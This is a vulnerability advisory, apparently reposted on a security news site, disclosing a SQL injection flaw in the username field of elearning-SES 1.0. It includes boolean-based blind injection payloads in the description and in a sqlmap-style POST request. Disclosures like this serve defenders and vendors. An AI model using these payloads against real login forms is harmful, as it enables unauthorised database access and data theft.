Home Tools Exploits & CVE's elearning-SES 1.0 Sql Injection

elearning-SES 1.0 Sql Injection

June 20, 2023

285

elearning-SES version 1.0 suffers from a remote SQL injection vulnerability.

## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.14.2023
## Vendor: https://github.com/oretnom23
## Software: https://github.com/oretnom23/php-elearning-system
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection
attacks. The payloads 73152795' or 7515=7515-- and 13684562' or
3996=3998-- were each submitted in the username parameter. These two
requests resulted in different responses, indicating that the input is
being incorporated into a SQL query in an unsafe way. The attacker can
easily steal all information from the database of this system.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)

## Proof and Exploit:
[href]()

## Time spend:
01:15:00

elearning-SES 1.0 Sql Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Investigation uncovers substantial spyware exports to Indonesia

Doctor Appointment Management System 1.0 Cross Site Scripting

Kemp LoadMaster Unauthenticated Command Injection

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

WordPress Photo Gallery 1.5.69 Cross Site Scripting

Gitea 1.16.6 Remote Code Execution

FLEX 1085 Web 1.6.0 HTML Injection